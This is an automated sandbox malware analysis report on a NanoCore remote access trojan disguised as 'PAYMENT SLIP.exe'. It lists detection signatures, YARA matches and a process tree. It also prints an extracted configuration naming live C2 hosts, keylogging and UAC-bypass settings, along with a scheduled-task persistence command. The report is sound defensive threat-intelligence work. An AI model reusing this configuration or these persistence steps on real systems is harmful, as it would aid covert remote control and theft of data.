Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PAYMENT SLIP.exe

Overview

General Information

Sample Name:PAYMENT SLIP.exe
Analysis ID:412302
MD5:50c9d58f61950484825d85a9a1372a7d
SHA1:79df49a23af28b6322f1fa461167b1145fc927de
SHA256:80726d3e380e4a7d0d1eee7f352c4a319e70dd4355a1a4f02ab27babc1a13d15
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PAYMENT SLIP.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
    • PAYMENT SLIP.exe (PID: 7116 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
      • MSBuild.exe (PID: 4228 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
      • PAYMENT SLIP.exe (PID: 5704 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
        • MSBuild.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
        • PAYMENT SLIP.exe (PID: 6900 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
          • MSBuild.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
  • hmhrpib.exe (PID: 6024 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 6372 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
      • schtasks.exe (PID: 6508 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • hmhrpib.exe (PID: 6376 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 6940 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
  • MSBuild.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)
    • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "c473d7c4-8173-4cff-8fb5-dfc81a12", "Group": "sea", "Domain1": "seaudo.hopto.org", "Domain2": "23.254.130.71", "Port": 3030, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q
      Click to see the 92 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.PAYMENT SLIP.exe.3160000.5.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe38d:$x1: NanoCore.ClientPluginHost
      • 0xe3ca:$x2: IClientNetworkHost
      • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      6.2.PAYMENT SLIP.exe.3160000.5.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe105:$x1: NanoCore Client.exe
      • 0xe38d:$x2: NanoCore.ClientPluginHost
      • 0xf9c6:$s1: PluginCommand
      • 0xf9ba:$s2: FileCommand
      • 0x1086b:$s3: PipeExists
      • 0x16622:$s4: PipeCreated
      • 0xe3b7:$s5: IClientLoggingHost
      6.2.PAYMENT SLIP.exe.3160000.5.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        6.2.PAYMENT SLIP.exe.3160000.5.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xe0f5:$a: NanoCore
        • 0xe105:$a: NanoCore
        • 0xe339:$a: NanoCore
        • 0xe34d:$a: NanoCore
        • 0xe38d:$a: NanoCore
        • 0xe154:$b: ClientPlugin
        • 0xe356:$b: ClientPlugin
        • 0xe396:$b: ClientPlugin
        • 0xe27b:$c: ProjectData
        • 0xec82:$d: DESCrypto
        • 0x1664e:$e: KeepAlive
        • 0x1463c:$g: LogClientMessage
        • 0x10837:$i: get_Connected
        • 0xefb8:$j: #=q
        • 0xefe8:$j: #=q
        • 0xf004:$j: #=q
        • 0xf034:$j: #=q
        • 0xf050:$j: #=q
        • 0xf06c:$j: #=q
        • 0xf09c:$j: #=q
        • 0xf0b8:$j: #=q
        10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 190 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c473d7c4-8173-4cff-8fb5-dfc81a12", "Group": "sea", "Domain1": "seaudo.hopto.org", "Domain2": "23.254.130.71", "Port": 3030, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeReversingLabs: Detection: 42%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: PAYMENT SLIP.exeJoe Sandbox ML: detected
        Source: 10.2.PAYMENT SLIP.exe.23e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 19.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 20.2.PAYMENT SLIP.exe.2f50000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 12.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.2.MSBuild.exe.4507ac8.19.unpackAvira: Label: TR/NanoCore.fadte
        Source: 12.2.MSBuild.exe.61a0000.33.unpackAvira: Label: TR/NanoCore.fadte
        Source: 1.2.PAYMENT SLIP.exe.3110000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.2.PAYMENT SLIP.exe.3060000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: PAYMENT SLIP.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: PAYMENT SLIP.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Windows\System.pdboo source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: indows\symbols\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbUGP source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb* source: MSBuild.exe, 0000000C.00000003.887823042.0000000001658000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: System.pdbX source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 0000000C.00000002.913261020.0000000005DA0000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C4E
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_0040689A FindFirstFileW,FindClose,1_2_0040689A
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00402902 FindFirstFileW,1_2_00402902
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405C4E
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_0040689A FindFirstFileW,FindClose,8_2_0040689A
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00402902 FindFirstFileW,8_2_00402902
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]12_2_06CD52C0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 4x nop then mov esp, ebp12_2_06CD42A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]12_2_06CD52B1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 4x nop then mov esp, ebp12_2_06CD4110

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49745 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49746 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49747 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49748 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49750 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49755 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49763 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49769 -> 23.254.130.71:3030
